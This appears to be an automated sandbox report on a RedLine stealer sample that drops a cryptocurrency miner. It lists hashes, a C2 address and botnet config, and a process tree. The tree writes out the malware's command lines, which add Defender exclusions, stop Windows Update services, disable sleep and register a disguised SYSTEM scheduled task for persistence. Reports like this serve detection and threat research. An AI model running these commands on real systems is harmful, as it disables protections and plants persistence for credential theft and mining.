Analysis
max time kernel: 135s
max time network: 143s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64 arch:x86 image:win7-20230712-en locale:en-us os:windows7-x64 system
submitted: 08-08-2023 06:20
Behavioral task behavioral1
Sample: 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Resource: win7-20230712-en

Behavioral task behavioral2
Sample: 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Resource: win10v2004-20230703-en
General
Target: 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Size: 208KB
MD5: d5b12454c999ea8b174e094da3ad1caa
SHA1: 78d6f1bcf392587d68b7eb1c0b8de4807e05c944
SHA256: 9c7b4f71c5a32da120b8fc3ab5e29facb953196351e2f6f58cf5030f0aa09568
SHA512: a9a6e780629561bf921887bd5270f2d60fdfb5831abdec471bb0cd7dd9b563c9d041191f8490f33181ea702b6c05ca12df2c4e0b89a5d99bc3965ce66b8c042e
SSDEEP: 3072:4eG4mt57f3YInEGK2U/YetUBaVa0b6AyM9w+Zxwak8e8hV:S4mt57gInEG3YetMb6
Malware Config
Extracted
Family: redline
Botnet: LogsDiller Cloud (TG: @logsdillabot)
C2: 209.250.248.11:33522
auth_value: 3a050df92d0cf082b2cdaf87863616be
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description | pid | Process | procid_target
PID 1840 created 1288 | 1840 | setup.exe | 17
PID 1840 created 1288 | 1840 | setup.exe | 17
PID 1840 created 1288 | 1840 | setup.exe | 17
PID 1840 created 1288 | 1840 | setup.exe | 17
PID 1840 created 1288 | 1840 | setup.exe | 17
PID 1284 created 1288 | 1284 | updater.exe | 17
PID 1284 created 1288 | 1284 | updater.exe | 17
PID 1284 created 1288 | 1284 | updater.exe | 17
PID 1284 created 1288 | 1284 | updater.exe | 17
PID 1284 created 1288 | 1284 | updater.exe | 17
PID 1284 created 1288 | 1284 | updater.exe | 17
XMRig Miner payload 9 IoCs
resource | yara_rule
behavioral1/memory/1284-215-0x000000013F0D0000-0x00000001402F6000-memory.dmp | xmrig
behavioral1/memory/2816-219-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2816-221-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2816-223-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2816-225-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2816-227-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2816-229-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2816-231-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2816-233-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | setup.exe
File created | C:\Windows\System32\drivers\etc\hosts | updater.exe

Stops running service(s) 3 TTPs

Executes dropped EXE 3 IoCs
pid | Process
2720 | mi.exe
1840 | setup.exe
1284 | updater.exe

Loads dropped DLL 3 IoCs
pid | Process
2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
2720 | mi.exe
1984 | taskeng.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Themida packer
resource | yara_rule
behavioral1/files/0x000e000000018fda-131.dat | themida
behavioral1/files/0x000e000000018fda-133.dat | themida
behavioral1/files/0x000e000000018fda-135.dat | themida
behavioral1/memory/2720-137-0x00000000044E0000-0x0000000005706000-memory.dmp | themida
behavioral1/memory/1840-136-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/memory/1840-139-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/memory/1840-140-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/memory/1840-141-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/memory/1840-142-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/memory/1840-143-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/memory/1840-145-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/files/0x000e000000018fda-174.dat | themida
behavioral1/memory/1840-176-0x000000013F680000-0x00000001408A6000-memory.dmp | themida
behavioral1/files/0x0011000000018fe5-179.dat | themida
behavioral1/files/0x0011000000018fe5-181.dat | themida
behavioral1/memory/1984-182-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-183-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-185-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-186-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-187-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-188-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-189-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-190-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-191-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-192-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/memory/1284-201-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
behavioral1/files/0x0011000000018fe5-213.dat | themida
behavioral1/memory/1284-215-0x000000013F0D0000-0x00000001402F6000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Drops file in System32 directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid | Process
1840 | setup.exe
1284 | updater.exe

Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 1284 set thread context of 2316 | 1284 | updater.exe | 73
PID 1284 set thread context of 2816 | 1284 | updater.exe | 74

Drops file in Program Files directory 2 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | setup.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2992 | sc.exe
2708 | sc.exe
888 | sc.exe
1700 | sc.exe
1908 | sc.exe
2124 | sc.exe
1448 | sc.exe
3020 | sc.exe
2812 | sc.exe
2472 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1252 | schtasks.exe
1696 | schtasks.exe

Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 707d338dc0c9d901 | powershell.exe
Modifies system certificate store
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (DER certificate blob omitted) | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (DER certificate blob omitted) | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (DER certificate blob omitted) | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (DER certificate blob omitted) | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
1840 | setup.exe
1840 | setup.exe
788 | powershell.exe
1840 | setup.exe
1840 | setup.exe
1840 | setup.exe
1840 | setup.exe
1840 | setup.exe
1840 | setup.exe
1676 | powershell.exe
1840 | setup.exe
1840 | setup.exe
1284 | updater.exe
1284 | updater.exe
3012 | powershell.exe
1284 | updater.exe
1284 | updater.exe
1284 | updater.exe
1284 | updater.exe
1284 | updater.exe
1284 | updater.exe
1748 | powershell.exe
1284 | updater.exe
1284 | updater.exe
1284 | updater.exe
1284 | updater.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe
2816 | explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs
pid | Process
472 | Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Token: SeDebugPrivilege | 788 | powershell.exe
Token: SeShutdownPrivilege | 1584 | powercfg.exe
Token: SeShutdownPrivilege | 960 | powercfg.exe
Token: SeDebugPrivilege | 1676 | powershell.exe
Token: SeShutdownPrivilege | 1812 | powercfg.exe
Token: SeShutdownPrivilege | 1560 | powercfg.exe
Token: SeDebugPrivilege | 3012 | powershell.exe
Token: SeShutdownPrivilege | 2672 | powercfg.exe
Token: SeDebugPrivilege | 1748 | powershell.exe
Token: SeShutdownPrivilege | 2392 | powercfg.exe
Token: SeShutdownPrivilege | 1476 | powercfg.exe
Token: SeShutdownPrivilege | 1416 | powercfg.exe
Token: SeLockMemoryPrivilege | 2816 | explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2600 wrote to memory of 2720 | 2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe | 31
PID 2600 wrote to memory of 2720 | 2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe | 31
PID 2600 wrote to memory of 2720 | 2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe | 31
PID 2600 wrote to memory of 2720 | 2600 | 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe | 31
PID 2720 wrote to memory of 1840 | 2720 | mi.exe | 32
PID 2720 wrote to memory of 1840 | 2720 | mi.exe | 32
PID 2720 wrote to memory of 1840 | 2720 | mi.exe | 32
PID 2720 wrote to memory of 1840 | 2720 | mi.exe | 32
PID 1228 wrote to memory of 1448 | 1228 | cmd.exe | 37
PID 1228 wrote to memory of 1448 | 1228 | cmd.exe | 37
PID 1228 wrote to memory of 1448 | 1228 | cmd.exe | 37
PID 1228 wrote to memory of 3020 | 1228 | cmd.exe | 38
PID 1228 wrote to memory of 3020 | 1228 | cmd.exe | 38
PID 1228 wrote to memory of 3020 | 1228 | cmd.exe | 38
PID 1228 wrote to memory of 2992 | 1228 | cmd.exe | 40
PID 1228 wrote to memory of 2992 | 1228 | cmd.exe | 40
PID 1228 wrote to memory of 2992 | 1228 | cmd.exe | 40
PID 1228 wrote to memory of 2812 | 1228 | cmd.exe | 39
PID 1228 wrote to memory of 2812 | 1228 | cmd.exe | 39
PID 1228 wrote to memory of 2812 | 1228 | cmd.exe | 39
PID 1228 wrote to memory of 2708 | 1228 | cmd.exe | 41
PID 1228 wrote to memory of 2708 | 1228 | cmd.exe | 41
PID 1228 wrote to memory of 2708 | 1228 | cmd.exe | 41
PID 3024 wrote to memory of 1584 | 3024 | cmd.exe | 46
PID 3024 wrote to memory of 1584 | 3024 | cmd.exe | 46
PID 3024 wrote to memory of 1584 | 3024 | cmd.exe | 46
PID 3024 wrote to memory of 960 | 3024 | cmd.exe | 47
PID 3024 wrote to memory of 960 | 3024 | cmd.exe | 47
PID 3024 wrote to memory of 960 | 3024 | cmd.exe | 47
PID 3024 wrote to memory of 1812 | 3024 | cmd.exe | 48
PID 3024 wrote to memory of 1812 | 3024 | cmd.exe | 48
PID 3024 wrote to memory of 1812 | 3024 | cmd.exe | 48
PID 3024 wrote to memory of 1560 | 3024 | cmd.exe | 49
PID 3024 wrote to memory of 1560 | 3024 | cmd.exe | 49
PID 3024 wrote to memory of 1560 | 3024 | cmd.exe | 49
PID 1676 wrote to memory of 1252 | 1676 | powershell.exe | 50
PID 1676 wrote to memory of 1252 | 1676 | powershell.exe | 50
PID 1676 wrote to memory of 1252 | 1676 | powershell.exe | 50
PID 1984 wrote to memory of 1284 | 1984 | taskeng.exe | 54
PID 1984 wrote to memory of 1284 | 1984 | taskeng.exe | 54
PID 1984 wrote to memory of 1284 | 1984 | taskeng.exe | 54
PID 1216 wrote to memory of 2472 | 1216 | cmd.exe | 59
PID 1216 wrote to memory of 2472 | 1216 | cmd.exe | 59
PID 1216 wrote to memory of 2472 | 1216 | cmd.exe | 59
PID 1216 wrote to memory of 888 | 1216 | cmd.exe | 60
PID 1216 wrote to memory of 888 | 1216 | cmd.exe | 60
PID 1216 wrote to memory of 888 | 1216 | cmd.exe | 60
PID 1216 wrote to memory of 1700 | 1216 | cmd.exe | 61
PID 1216 wrote to memory of 1700 | 1216 | cmd.exe | 61
PID 1216 wrote to memory of 1700 | 1216 | cmd.exe | 61
PID 1216 wrote to memory of 1908 | 1216 | cmd.exe | 62
PID 1216 wrote to memory of 1908 | 1216 | cmd.exe | 62
PID 1216 wrote to memory of 1908 | 1216 | cmd.exe | 62
PID 1216 wrote to memory of 2124 | 1216 | cmd.exe | 63
PID 1216 wrote to memory of 2124 | 1216 | cmd.exe | 63
PID 1216 wrote to memory of 2124 | 1216 | cmd.exe | 63
PID 2060 wrote to memory of 2672 | 2060 | cmd.exe | 68
PID 2060 wrote to memory of 2672 | 2060 | cmd.exe | 68
PID 2060 wrote to memory of 2672 | 2060 | cmd.exe | 68
PID 2060 wrote to memory of 2392 | 2060 | cmd.exe | 69
PID 2060 wrote to memory of 2392 | 2060 | cmd.exe | 69
PID 2060 wrote to memory of 2392 | 2060 | cmd.exe | 69
PID 2060 wrote to memory of 1476 | 2060 | cmd.exe | 70
PID 2060 wrote to memory of 1476 | 2060 | cmd.exe | 70
Processes

C:\Windows\Explorer.EXE (depth 1, PID:1288)
  cmdline: C:\Windows\Explorer.EXE

  C:\Users\Admin\AppData\Local\Temp\2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe (depth 2, PID:2600)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe"
    - Loads dropped DLL
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\mi.exe (depth 3, PID:2720)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\mi.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Windows\Temp\setup.exe (depth 4, PID:1840)
        cmdline: "C:\Windows\Temp\setup.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Program Files directory
        - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID:788)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\cmd.exe (depth 2, PID:1228)
    cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\sc.exe (depth 3, PID:1448)
      cmdline: sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:3020)
      cmdline: sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:2812)
      cmdline: sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:2992)
      cmdline: sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:2708)
      cmdline: sc stop dosvc
      - Launches sc.exe

  C:\Windows\System32\cmd.exe (depth 2, PID:3024)
    cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\powercfg.exe (depth 3, PID:1584)
      cmdline: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe (depth 3, PID:960)
      cmdline: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe (depth 3, PID:1812)
      cmdline: powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe (depth 3, PID:1560)
      cmdline: powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID:1676)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe (depth 3, PID:1252)
      cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      - Creates scheduled task(s)

  C:\Windows\System32\schtasks.exe (depth 2, PID:2416)
    cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID:3012)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\cmd.exe (depth 2, PID:1216)
    cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\sc.exe (depth 3, PID:2472)
      cmdline: sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:888)
      cmdline: sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:1700)
      cmdline: sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:1908)
      cmdline: sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe (depth 3, PID:2124)
      cmdline: sc stop dosvc
      - Launches sc.exe

  C:\Windows\System32\cmd.exe (depth 2, PID:2060)
    cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\powercfg.exe (depth 3, PID:2672)
      cmdline: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe (depth 3, PID:2392)
      cmdline: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe (depth 3, PID:1476)
      cmdline: powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe (depth 3, PID:1416)
      cmdline: powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID:1748)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\schtasks.exe (depth 3, PID:1696)
      cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      - Creates scheduled task(s)

  C:\Windows\System32\conhost.exe (depth 2, PID:2316)
    cmdline: C:\Windows\System32\conhost.exe

  C:\Windows\explorer.exe (depth 2, PID:2816)
    cmdline: C:\Windows\explorer.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\taskeng.exe (depth 1, PID:1984)
  cmdline: taskeng.exe {0B40C90E-EDC3-43D9-952E-CCC9B7DF66D7} S-1-5-18:NT AUTHORITY\System:Service:
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Program Files\Google\Chrome\updater.exe (depth 2, PID:1284)
    cmdline: "C:\Program Files\Google\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Persistence
  Create or Modify System Process (1): Windows Service (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Create or Modify System Process (1): Windows Service (1)
  Scheduled Task/Job (1)